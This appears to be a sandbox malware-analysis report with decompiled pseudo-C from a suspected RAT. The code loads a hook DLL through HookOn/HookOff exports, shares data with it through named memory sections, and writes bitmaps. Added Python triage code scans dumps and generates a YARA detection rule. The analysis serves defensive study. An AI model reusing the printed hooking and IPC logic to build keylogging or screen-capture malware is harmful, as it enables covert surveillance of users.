                                                    				intOrPtr _t70;
                                                    				void* _t74;
                                                    				void* _t75;
                                                    				void* _t76;
                                                    				void* _t77;
                                                    				void* _t78;
                                                    				intOrPtr _t82;
                                                    				intOrPtr _t86;
                                                    				intOrPtr _t89;
                                                    				void _t97;
                                                    				void* _t99;
                                                    				intOrPtr _t102;
                                                    
                                                    				_push(0);
                                                    				_t97 = __ecx;
                                                    				_t74 = __edx;
                                                    				_t99 = __eax;
                                                    				_push(_t102);
                                                    				_push(0x476697);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t102;   // enter a Delphi try/finally frame (SEH chain at fs:[0])
                                                    				if(__edx == 0) {
                                                    					// Teardown path: unhook, unload the DLL and release both shared sections.
                                                    					if( *((intOrPtr*)(__eax + 0x48)) != 0) {
                                                    						 *((intOrPtr*)(__eax + 0x48))();   // HookOff()
                                                    					}
                                                    					_t30 =  *(_t99 + 0x40);
                                                    					if(_t30 != 0) {
                                                    						FreeLibrary(_t30);
                                                    					}
                                                    					if( *(_t99 + 0x30) != 0) {
                                                    						UnmapViewOfFile( *(_t99 + 0x38));
                                                    						UnmapViewOfFile( *(_t99 + 0x3c));
                                                    						CloseHandle( *(_t99 + 0x30));
                                                    						CloseHandle( *(_t99 + 0x34));
                                                    					}
                                                    				} else {
                                                    					// Setup path: build the DLL path from the global string at 0x49ec58 (still 0
                                                    					// in this dump), convert it to a PChar with E00404E80 and load it.
                                                    					_t82 =  *0x49ec58; // 0x0
                                                    					E0047671C(__edx, _t82, __edx, __ecx, __eax);
                                                    					_t46 =  *0x49ec5c; // 0x0
                                                    					 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t46));
                                                    					if( *(_t99 + 0x40) == 0) {
                                                    						// First load failed: retry with a second path assembled from the
                                                    						// same global and the string constant at 0x4766ac.
                                                    						_t86 =  *0x49ec58; // 0x0
                                                    						E00404CCC( &_v8, _t86, 0x4766ac);
                                                    						E0047671C(_t74, _v8, _t74, _t97, _t99);
                                                    						_t70 =  *0x49ec5c; // 0x0
                                                    						 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t70));
                                                    					}
                                                    					// Resolve both exports; if either is missing, report through the error
                                                    					// helper pair (message at 0x4766c8) that is also used for section failures.
                                                    					 *((intOrPtr*)(_t99 + 0x44)) = GetProcAddress( *(_t99 + 0x40), "HookOn");
                                                    					 *((intOrPtr*)(_t99 + 0x48)) = GetProcAddress( *(_t99 + 0x40), "HookOff");
                                                    					if( *((intOrPtr*)(_t99 + 0x44)) == 0 ||  *((intOrPtr*)(_t99 + 0x48)) == 0) {
                                                    						E0040D144(0x4766c8, 1);
                                                    						E00404378();
                                                    					}
                                                    					// Pagefile-backed section (INVALID_HANDLE_VALUE), PAGE_READWRITE (4), 4 bytes,
                                                    					// with a fixed name: any process that opens "ElReceptor" sees the value
                                                    					// stored below. That is the IPC channel between this process and the hook DLL.
                                                    					_t75 = CreateFileMappingA(0xffffffff, 0, 4, 0, 4, "ElReceptor");
                                                    					 *(_t99 + 0x30) = _t75;
                                                    					if(_t75 == 0) {
                                                    						E0040D144(0x4766f8, 1);
                                                    						E00404378();
                                                    					}
                                                    					_t76 = MapViewOfFile( *(_t99 + 0x30), 2, 0, 0, 0);   // FILE_MAP_WRITE
                                                    					 *(_t99 + 0x38) = _t76;
                                                    					 *_t76 = _t97;   // publish __ecx (4 bytes, handle-sized) for the hook DLL
                                                    					// Second section, same layout, named "CBReceptor".
                                                    					_t77 = CreateFileMappingA(0xffffffff, 0, 4, 0, 4, "CBReceptor");
                                                    					 *(_t99 + 0x34) = _t77;
                                                    					if(_t77 == 0) {
                                                    						E0040D144(0x4766f8, 1);
                                                    						E00404378();
                                                    					}
                                                    					_t78 = MapViewOfFile( *(_t99 + 0x34), 2, 0, 0, 0);   // FILE_MAP_WRITE
                                                    					 *(_t99 + 0x3c) = _t78;
                                                    					 *_t78 = _t97;
                                                    					 *((intOrPtr*)(_t99 + 0x44))();   // HookOn() in the loaded DLL, after both sections are populated
                                                    				}
                                                    				_pop(_t89);
                                                    				 *[fs:eax] = _t89;   // leave the try/finally frame
                                                    				_push(0x47669e);
                                                    				return E004049C0( &_v8);   // finalizer: releases the temporary string _v8
                                                    			}

                                                    0x004764e7
                                                    0x004764ec
                                                    0x004764ee
                                                    0x004764f0
                                                    0x004764f4
                                                    0x004764f5
                                                    0x004764fa
                                                    0x004764fd
                                                    0x00476502
                                                    0x00476645
                                                    0x00476647
                                                    0x00476647
                                                    0x0047664a
                                                    0x0047664f
                                                    0x00476652
                                                    0x00476652
                                                    0x0047665b
                                                    0x00476661
                                                    0x0047666a
                                                    0x00476673
                                                    0x0047667c
                                                    0x0047667c
                                                    0x00476508
                                                    0x00476508
                                                    0x00476512
                                                    0x00476517
                                                    0x00476527
                                                    0x0047652e
                                                    0x00476533
                                                    0x0047653e
                                                    0x0047654a
                                                    0x0047654f
                                                    0x0047655f
                                                    0x0047655f
                                                    0x00476570
                                                    0x00476581
                                                    0x00476588
                                                    0x0047659c
                                                    0x004765a1
                                                    0x004765a1
                                                    0x004765ba
                                                    0x004765bc
                                                    0x004765c1
                                                    0x004765cf
                                                    0x004765d4
                                                    0x004765d4
                                                    0x004765ea
                                                    0x004765ec
                                                    0x004765ef
                                                    0x00476605
                                                    0x00476607
                                                    0x0047660c
                                                    0x0047661a
                                                    0x0047661f
                                                    0x0047661f
                                                    0x00476635
                                                    0x00476637
                                                    0x0047663a
                                                    0x0047663c
                                                    0x0047663c
                                                    0x00476683
                                                    0x00476686
                                                    0x00476689
                                                    0x00476696

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(00000000,00000000,00476697,?,?,?,?,00000000), ref: 00476522
                                                    • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00476697), ref: 0047655A
                                                    • GetProcAddress.KERNEL32(00000000,HookOn), ref: 0047656B
                                                    • GetProcAddress.KERNEL32(00000000,HookOff), ref: 0047657C
                                                    • CreateFileMappingA.KERNEL32 ref: 004765B5
                                                    • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,00000004,00000000,00000004,ElReceptor,00000000,HookOff,00000000,HookOn), ref: 004765E5
                                                    • CreateFileMappingA.KERNEL32 ref: 00476600
                                                    • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,00000004,00000000,00000004,CBReceptor,?,00000002,00000000,00000000,00000000), ref: 00476630
                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476652
                                                    • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476661
                                                    • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 0047666A
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476673
                                                    • CloseHandle.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0047667C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$View$Library$AddressCloseCreateHandleLoadMappingProcUnmap$Free
                                                    • String ID: CBReceptor$ElReceptor$HookOff$HookOn
                                                    • API String ID: 2408097603-676361416
                                                    • Opcode ID: 72e6fa980a1183395053bc88635b47a3b0f05e5c8ec6e6a6430965d3f8941275
                                                    • Instruction ID: bf3a7df91238c31d5b8269ba8868fe670cbdf993f40fb106005159f73c36cbb0
                                                    • Opcode Fuzzy Hash: 72e6fa980a1183395053bc88635b47a3b0f05e5c8ec6e6a6430965d3f8941275
                                                    • Instruction Fuzzy Hash: 534163B0700B00ABD730BBB6DD86B5677E5AB44708F91453FF649AB6D1CA79B8048B0C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
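
The function above leaves four fixed artifacts in any dump of this module: the export names it resolves (HookOn, HookOff) and the section names it creates (ElReceptor, CBReceptor). The following is an added triage example, not code from Joe Sandbox or from the analysed sample: it runs a `strings`-style pass over a dumped region, requires a hit from both artifact groups before it calls the pattern a match (a lone HookOn export is common in benign hook DLLs), and emits an equivalent YARA rule. The indicator names come from the decompiled code; the function names, the rule shape and the sample buffer are assumptions constructed here for illustration, and the same `scan_dump` can be pointed at the `.sdmp` files listed under Memory Dump Source.

```python
"""Memory-dump triage for the hook-loader artifacts seen in E004764E4.

Added example, not code from Joe Sandbox or from the analysed sample. The
indicator names (HookOn, HookOff, ElReceptor, CBReceptor) come from the
decompiled function; the function names, the rule shape and the sample
buffer are constructed here for illustration.
"""
import re
from dataclasses import dataclass, field

# Printable-ASCII runs of four or more bytes, the same notion of a "string"
# that `strings -n 4` applies to a dump.
_ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")

# Artifacts grouped by the role they play in the loader. The verdict requires a
# hit in every group, so a lone "HookOn" does not fire on its own.
HOOK_LOADER_INDICATORS = {
    "hook_exports": (b"HookOn", b"HookOff"),           # resolved with GetProcAddress
    "named_sections": (b"ElReceptor", b"CBReceptor"),  # CreateFileMappingA names
}


@dataclass
class ScanResult:
    hits: dict = field(default_factory=dict)          # indicator -> list of offsets
    matched_groups: set = field(default_factory=set)

    @property
    def verdict(self) -> bool:
        """True only when every indicator group matched at least once."""
        return self.matched_groups == set(HOOK_LOADER_INDICATORS)


def extract_strings(buf: bytes):
    """Yield (offset, run) for every printable-ASCII run in the buffer."""
    for m in _ASCII_RUN.finditer(buf):
        yield m.start(), m.group()


def scan_dump(buf: bytes, indicators=HOOK_LOADER_INDICATORS) -> ScanResult:
    """Locate each indicator inside the extracted strings and record its offset."""
    result = ScanResult()
    for off, run in extract_strings(buf):
        for group, names in indicators.items():
            for name in names:
                idx = run.find(name)
                if idx != -1:
                    result.hits.setdefault(name.decode(), []).append(off + idx)
                    result.matched_groups.add(group)
    return result


def to_yara_rule(rule_name: str, indicators=HOOK_LOADER_INDICATORS) -> str:
    """Emit an equivalent YARA rule: at least one string from every group."""
    lines = [f"rule {rule_name}", "{", "    strings:"]
    for group, names in indicators.items():
        for i, name in enumerate(names):
            lines.append(f'        ${group}_{i} = "{name.decode()}" ascii')
    cond = " and ".join(f"(1 of (${group}_*))" for group in indicators)
    lines += ["    condition:", f"        {cond}", "}"]
    return "\n".join(lines)


def build_sample_dump() -> bytes:
    """Constructed stand-in for a dumped read-only data region: NUL-terminated
    literals with non-printable filler. Not bytes from the real sample."""
    return (b"\x00" * 16
            + b"HookOn\x00\x00"                 # offset 16
            + b"HookOff\x00"                    # offset 24
            + b"\x90\x90\x55\x8b\xec"           # filler, no 4-byte printable run
            + b"ElReceptor\x00\x00"             # offset 37
            + b"CBReceptor\x00"                 # offset 49
            + b"\xff" * 8)


if __name__ == "__main__":
    res = scan_dump(build_sample_dump())
    for name, offsets in sorted(res.hits.items()):
        print(f"{name:<12} at {', '.join(hex(o) for o in offsets)}")
    print("hook-loader pattern:", "MATCH" if res.verdict else "no match")
    print(to_yara_rule("HookLoader_ElReceptor_CBReceptor"))
```

The offsets reported for a real dump are relative to the start of the region; add the region's base (0x00400000 for the dumps above) to turn them into virtual addresses that can be cross-checked against the `ref:` values in the APIs list.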

                                                    C-Code - Quality: 65%
                                                    			E0042A510(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr* _v12;
                                                    				void* _v16;
                                                    				struct HDC__* _v20;
                                                    				char _v24;
                                                    				intOrPtr* _v28;
                                                    				intOrPtr _v32;
                                                    				intOrPtr _v36;
                                                    				signed int _v37;
                                                    				intOrPtr _v44;
                                                    				void* _v48;
                                                    				struct HDC__* _v52;
                                                    				intOrPtr _v56;
                                                    				intOrPtr* _v60;
                                                    				intOrPtr* _v64;
                                                    				short _v66;
                                                    				short _v68;
                                                    				signed short _v70;
                                                    				signed short _v72;
                                                    				void* _v76;
                                                    				intOrPtr _v172;
                                                    				char _v174;
                                                    				intOrPtr _t150;
                                                    				signed int _t160;
                                                    				intOrPtr _t163;
                                                    				void* _t166;
                                                    				void* _t174;
                                                    				void* _t183;
                                                    				signed int _t188;
                                                    				intOrPtr _t189;
                                                    				struct HDC__* _t190;
                                                    				struct HDC__* _t204;
                                                    				signed int _t208;
                                                    				signed short _t214;
                                                    				intOrPtr _t241;
                                                    				intOrPtr* _t245;
                                                    				intOrPtr _t251;
                                                    				intOrPtr _t289;
                                                    				intOrPtr _t290;
                                                    				intOrPtr _t295;
                                                    				signed int _t297;
                                                    				signed int _t317;
                                                    				void* _t319;
                                                    				void* _t320;
                                                    				signed int _t321;
                                                    				void* _t322;
                                                    				void* _t323;
                                                    				void* _t324;
                                                    				intOrPtr _t325;
                                                    
                                                    				_t316 = __edi;
                                                    				_t323 = _t324;
                                                    				_t325 = _t324 + 0xffffff54;
                                                    				_t319 = __ecx;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				_v52 = 0;
                                                    				_v44 = 0;
                                                    				_v60 = 0;
                                                    				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
                                                    				_v37 = _v36 == 0xc;
                                                    				if(_v37 != 0) {
                                                    					_v36 = 0x28;
                                                    				}
                                                    				_v28 = E0040275C(_v36 + 0x40c);
                                                    				_v64 = _v28;
                                                    				_push(_t323);
                                                    				_push(0x42aa2d);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t325;
                                                    				_push(_t323);
                                                    				_push(0x42aa00);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t325;
                                                    				if(_v37 == 0) {
                                                    					 *((intOrPtr*)( *_v12 + 0xc))();
                                                    					_t320 = _t319 - _v36;
                                                    					_t150 =  *((intOrPtr*)(_v64 + 0x10));
                                                    					if(_t150 != 3 && _t150 != 0) {
                                                    						_v60 = E00403BBC(1);
                                                    						if(_a4 == 0) {
                                                    							E004032B4( &_v174, 0xe);
                                                    							_v174 = 0x4d42;
                                                    							_v172 = _v36 + _t320;
                                                    							_a4 =  &_v174;
                                                    						}
                                                    						 *((intOrPtr*)( *_v60 + 0x10))();
                                                    						 *((intOrPtr*)( *_v60 + 0x10))();
                                                    						 *((intOrPtr*)( *_v60 + 0x10))();
                                                    						E0041D93C(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
                                                    						 *((intOrPtr*)( *_v60 + 0x14))();
                                                    						_v12 = _v60;
                                                    					}
                                                    				} else {
                                                    					 *((intOrPtr*)( *_v12 + 0xc))();
                                                    					_t251 = _v64;
                                                    					E004032B4(_t251, 0x28);
                                                    					_t241 = _t251;
                                                    					 *(_t241 + 4) = _v72 & 0x0000ffff;
                                                    					 *(_t241 + 8) = _v70 & 0x0000ffff;
                                                    					 *((short*)(_t241 + 0xc)) = _v68;
                                                    					 *((short*)(_t241 + 0xe)) = _v66;
                                                    					_t320 = _t319 - 0xc;
                                                    				}
                                                    				_t245 = _v64;
                                                    				 *_t245 = _v36;
                                                    				_v32 = _v28 + _v36;
                                                    				if( *((short*)(_t245 + 0xc)) != 1) {
                                                    					E00425F40();
                                                    				}
                                                    				if(_v36 == 0x28) {
                                                    					_t214 =  *(_t245 + 0xe);
                                                    					if(_t214 == 0x10 || _t214 == 0x20) {
                                                    						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
                                                    							E0041D8CC(_v12, 0xc, _v32);
                                                    							_v32 = _v32 + 0xc;
                                                    							_t320 = _t320 - 0xc;
                                                    						}
                                                    					}
                                                    				}
                                                    				if( *(_t245 + 0x20) == 0) {
                                                    					 *(_t245 + 0x20) = E004261D0( *(_t245 + 0xe));
                                                    				}
                                                    				_t317 = _v37 & 0x000000ff;
                                                    				_t257 =  *(_t245 + 0x20) * 0;
                                                    				E0041D8CC(_v12,  *(_t245 + 0x20) * 0, _v32);
                                                    				_t321 = _t320 -  *(_t245 + 0x20) * 0;
                                                    				if( *(_t245 + 0x14) == 0) {
                                                    					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
                                                    					_t208 = E004261F0( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
                                                    					asm("cdq");
                                                    					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
                                                    					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
                                                    				}
                                                    				_t160 =  *(_t245 + 0x14);
                                                    				if(_t321 > _t160) {
                                                    					_t321 = _t160;
                                                    				}
                                                    				if(_v37 != 0) {
                                                    					_t160 = E00426498(_v32);
                                                    				}
                                                    				_push(0);
                                                    				L00407638();
                                                    				_v16 = E00426060(_t160);
                                                    				_push(_t323);
                                                    				_push(0x42a97b);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t325;
                                                    				_t163 =  *((intOrPtr*)(_v64 + 0x10));
                                                    				if(_t163 == 0 || _t163 == 3) {
                                                    					if( *0x49b620 == 0) {
                                                    						_push(0);
                                                    						_push(0);
                                                    						_push( &_v24);
                                                    						_push(0);
                                                    						_push(_v28);
                                                    						_t166 = _v16;
                                                    						_push(_t166);
                                                    						L004072E8();
                                                    						_v44 = _t166;
                                                    						if(_v44 == 0 || _v24 == 0) {
                                                    							if(GetLastError() != 0) {
                                                    								E0040E79C(_t245, _t257, _t317, _t321);
                                                    							} else {
                                                    								E00425F40();
                                                    							}
                                                    						}
                                                    						_push(_t323);
                                                    						_push( *[fs:eax]);
                                                    						 *[fs:eax] = _t325;
                                                    						E0041D8CC(_v12, _t321, _v24);
                                                    						_pop(_t289);
                                                    						 *[fs:eax] = _t289;
                                                    						_t290 = 0x42a94a;
                                                    						 *[fs:eax] = _t290;
                                                    						_push(0x42a982);
                                                    						_t174 = _v16;
                                                    						_push(_t174);
                                                    						_push(0);
                                                    						L00407888();
                                                    						return _t174;
                                                    					} else {
                                                    						goto L27;
                                                    					}
                                                    				} else {
                                                    					L27:
                                                    					_v20 = 0;
                                                    					_v24 = E0040275C(_t321);
                                                    					_push(_t323);
                                                    					_push(0x42a8e3);
                                                    					_push( *[fs:edx]);
                                                    					 *[fs:edx] = _t325;
                                                    					_t263 = _t321;
                                                    					E0041D8CC(_v12, _t321, _v24);
                                                    					_push(_v16);
                                                    					L004072E0();
                                                    					_v20 = E00426060(_v16);
                                                    					_push(1);
                                                    					_push(1);
                                                    					_t183 = _v16;
                                                    					_push(_t183);
                                                    					L004072D8();
                                                    					_v48 = SelectObject(_v20, _t183);
                                                    					_v56 = 0;
                                                    					_t188 =  *(_v64 + 0x20);
                                                    					if(_t188 > 0) {
                                                    						_t263 = _t188;
                                                    						_v52 = E00426750(0, _t188);
                                                    						_push(0);
                                                    						_push(_v52);
                                                    						_t204 = _v20;
                                                    						_push(_t204);
                                                    						L00407440();
                                                    						_v56 = _t204;
                                                    						_push(_v20);
                                                    						L00407418();
                                                    					}
                                                    					_push(_t323);
                                                    					_push(0x42a8b7);
                                                    					_push( *[fs:edx]);
                                                    					 *[fs:edx] = _t325;
                                                    					_push(0);
                                                    					_t189 = _v28;
                                                    					_push(_t189);
                                                    					_push(_v24);
                                                    					_push(4);
                                                    					_push(_t189);
                                                    					_t190 = _v20;
                                                    					_push(_t190);
                                                    					L004072F0();
                                                    					_v44 = _t190;
                                                    					if(_v44 == 0) {
                                                    						if(GetLastError() != 0) {
                                                    							E0040E79C(_t245, _t263, _t317, _t321);
                                                    						} else {
                                                    							E00425F40();
                                                    						}
                                                    					}
                                                    					_pop(_t295);
                                                    					 *[fs:eax] = _t295;
                                                    					_push(0x42a8be);
                                                    					if(_v56 != 0) {
                                                    						_push(0xffffffff);
                                                    						_push(_v56);
                                                    						_push(_v20);
                                                    						L00407440();
                                                    					}
                                                    					return DeleteObject(SelectObject(_v20, _v48));
                                                    				}
                                                    			}
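The constants in the routine above give away what it writes: 0x4d42 stored into _v174 is the little-endian "BM" file signature, 0x28 is sizeof(BITMAPINFOHEADER), and the fields read through _t245 line up with that structure (+0x4 biWidth, +0x8 biHeight, +0xc biPlanes, +0xe biBitCount, +0x10 biCompression, +0x14 biSizeImage, +0x20 biClrUsed). The writer refuses biPlanes != 1, appends 12 bytes of colour masks when biCompression is 3 (BI_BITFIELDS) at 16 or 32 bpp, derives the palette size from the bit depth when biClrUsed is 0, and computes biSizeImage as a 32-bit-aligned scanline length times the absolute height when it is 0. The Python below is an added, stand-alone illustration of that on-disk layout, not code from the sample or from this report: it serialises a DIB in the same order and parses the result back with the same checks. The function names, the constructed pixel bytes and the RGB masks are assumptions made for the example.

```python
import struct

BI_RGB = 0
BI_BITFIELDS = 3
INFO_HDR_SIZE = 0x28  # sizeof(BITMAPINFOHEADER), the 0x28 tested in the decompiled code

# BITMAPFILEHEADER: bfType, bfSize, bfReserved1, bfReserved2, bfOffBits (14 bytes)
FILE_HDR = struct.Struct("<2sIHHI")
# BITMAPINFOHEADER: biSize, biWidth, biHeight, biPlanes, biBitCount, biCompression,
# biSizeImage, biXPelsPerMeter, biYPelsPerMeter, biClrUsed, biClrImportant (40 bytes)
INFO_HDR = struct.Struct("<IiiHHIIiiII")


def bytes_per_scanline(width, bpp, align_bits=32):
    """Row stride in bytes, each row padded to a 32-bit boundary as DIBs require."""
    bits = width * bpp + align_bits - 1
    return (bits & ~(align_bits - 1)) >> 3


def palette_entries(bpp, clr_used):
    """Palette size when biClrUsed is 0: 2**bpp colours for <= 8 bpp, none otherwise."""
    if clr_used:
        return clr_used
    return 1 << bpp if bpp <= 8 else 0


def build_bmp(width, height, bpp, pixels, compression=BI_RGB, masks=(), palette=()):
    """Serialise a DIB in the order the decompiled writer emits it: file header,
    info header, colour masks (BI_BITFIELDS at 16/32 bpp only), palette, pixel rows.
    Assumed helper used here only to construct test input."""
    masks_blob = b""
    if compression == BI_BITFIELDS and bpp in (16, 32):
        masks_blob = struct.pack("<III", *masks)
    palette_blob = b"".join(struct.pack("<I", rgb) for rgb in palette)
    size_image = bytes_per_scanline(width, bpp) * abs(height)
    if len(pixels) != size_image:
        raise ValueError("pixel buffer must be stride * |height| = %d bytes" % size_image)
    off_bits = FILE_HDR.size + INFO_HDR_SIZE + len(masks_blob) + len(palette_blob)
    info = INFO_HDR.pack(INFO_HDR_SIZE, width, height, 1, bpp, compression,
                         size_image, 0, 0, len(palette), 0)
    file_hdr = FILE_HDR.pack(b"BM", off_bits + size_image, 0, 0, off_bits)
    return file_hdr + info + masks_blob + palette_blob + pixels


def parse_bmp(data):
    """Validate a BMP blob with the checks the writer relies on and return its layout."""
    if len(data) < FILE_HDR.size + INFO_HDR_SIZE:
        raise ValueError("truncated header")
    magic, file_size, _, _, off_bits = FILE_HDR.unpack_from(data, 0)
    if magic != b"BM":                      # 0x4d42 read as a little-endian word
        raise ValueError("bad magic")
    (bi_size, width, height, planes, bpp, compression, size_image,
     _, _, clr_used, _) = INFO_HDR.unpack_from(data, FILE_HDR.size)
    if bi_size != INFO_HDR_SIZE:
        raise ValueError("unsupported info header size %d" % bi_size)
    if planes != 1:                         # the writer aborts on biPlanes != 1
        raise ValueError("biPlanes must be 1")
    pos = FILE_HDR.size + bi_size
    masks = ()
    if compression == BI_BITFIELDS and bpp in (16, 32):
        if pos + 12 > len(data):
            raise ValueError("truncated colour masks")
        masks = struct.unpack_from("<III", data, pos)
        pos += 12
    pos += palette_entries(bpp, clr_used) * 4
    stride = bytes_per_scanline(width, bpp)
    if size_image == 0:                     # biSizeImage may legitimately be left 0
        size_image = stride * abs(height)
    if off_bits < pos or off_bits + size_image > len(data):
        raise ValueError("pixel data lies outside the buffer")
    return {
        "file_size": file_size, "width": width, "height": height, "bpp": bpp,
        "compression": compression, "masks": masks, "stride": stride,
        "size_image": size_image, "palette_entries": palette_entries(bpp, clr_used),
        "pixel_offset": off_bits, "bottom_up": height > 0,
    }


def is_well_formed(data):
    """True when parse_bmp accepts the blob, False on any layout error."""
    try:
        parse_bmp(data)
        return True
    except ValueError:
        return False
```

The bounds check on bfOffBits and biSizeImage is the part worth keeping when triaging bitmaps recovered from a RAT's memory or traffic: a header whose declared pixel area runs past the buffer is either truncated or deliberately malformed, and a naive reader that trusts biSizeImage will over-read.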
                                                    (Per-line instruction address column for the routine above, covering 0x0042a510 through 0x0042a97a; entries of 0x00000000 mark C-code lines with no mapped instruction.)

                                                    APIs
                                                    • 733AAC50.USER32(00000000,?,00000000,0042AA2D,?,?), ref: 0042A77A
                                                    • 733AA590.GDI32(00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000,?,00000000,0042AA2D,?,?), ref: 0042A7DF
                                                    • 733AA520.GDI32(00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000,?,00000000,0042AA2D,?,?), ref: 0042A7F4
                                                    • SelectObject.GDI32(?,00000000), ref: 0042A7FE
                                                    • 733AB410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000), ref: 0042A82E
                                                    • 733AB150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B), ref: 0042A83A
                                                    • 733AA7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042A85E
                                                    • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042A86C
                                                    • 733AB410.GDI32(?,00000000,000000FF,0042A8BE,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001), ref: 0042A89E
                                                    • SelectObject.GDI32(?,?), ref: 0042A8AB
                                                    • DeleteObject.GDI32(00000000), ref: 0042A8B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                                    • String ID: ($BM
                                                    • API String ID: 3415089252-2980357723
                                                    • Opcode ID: 496f69271fb9ccee439b3da71489c37b304fc4bf0672b7fc97fcd75c0970043d
                                                    • Instruction ID: 25b6b903fc63a4d1ab3304e11741f41bc99333438c5c48279b365a0d6610163c
                                                    • Opcode Fuzzy Hash: 496f69271fb9ccee439b3da71489c37b304fc4bf0672b7fc97fcd75c0970043d
                                                    • Instruction Fuzzy Hash: A8D14C74F002189FDB04EFA9D885BAEBBB5FF48304F54846AE904E7391D7389851CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 51%
                                                    			E00426070(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                    				void* _v8;
                                                    				int _v12;
                                                    				int _v16;
                                                    				void* _v20;
                                                    				int _v24;
                                                    				struct HDC__* _v28;
                                                    				struct HDC__* _v32;
                                                    				int _v48;
                                                    				int _v52;
                                                    				void _v56;
                                                    				int _t37;
                                                    				void* _t41;
                                                    				int _t43;
                                                    				void* _t47;
                                                    				void* _t72;
                                                    				intOrPtr _t79;
                                                    				intOrPtr _t80;
                                                    				void* _t85;
                                                    				void* _t87;
                                                    				void* _t88;
                                                    				intOrPtr _t89;
                                                    
                                                    				_t87 = _t88;
                                                    				_t89 = _t88 + 0xffffffcc;
                                                    				asm("movsd");
                                                    				asm("movsd");
                                                    				_t71 = __ecx;
                                                    				_v8 = __eax;
                                                    				_push(0);
                                                    				L004072E0();
                                                    				_v28 = __eax;
                                                    				_push(0);
                                                    				L004072E0();
                                                    				_v32 = __eax;
                                                    				_push(_t87);
                                                    				_push(0x4261be);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t89;
                                                    				_t37 = GetObjectA(_v8, 0x18,  &_v56);
                                                    				if(__ecx == 0) {
                                                    					_push(0);
                                                    					L00407638();
                                                    					_v24 = _t37;
                                                    					if(_v24 == 0) {
                                                    						E00425FB8(__ecx);
                                                    					}
                                                    					_push(_t87);
                                                    					_push(0x42612d);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t89;
                                                    					_push(_v12);
                                                    					_push(_v16);
                                                    					_t41 = _v24;
                                                    					_push(_t41);
                                                    					L004072D8();
                                                    					_v20 = _t41;
                                                    					if(_v20 == 0) {
                                                    						E00425FB8(_t71);
                                                    					}
                                                    					_pop(_t79);
                                                    					 *[fs:eax] = _t79;
                                                    					_push(0x426134);
                                                    					_t43 = _v24;
                                                    					_push(_t43);
                                                    					_push(0);
                                                    					L00407888();
                                                    					return _t43;
                                                    				} else {
                                                    					_push(0);
                                                    					_push(1);
                                                    					_push(1);
                                                    					_push(_v12);
                                                    					_t47 = _v16;
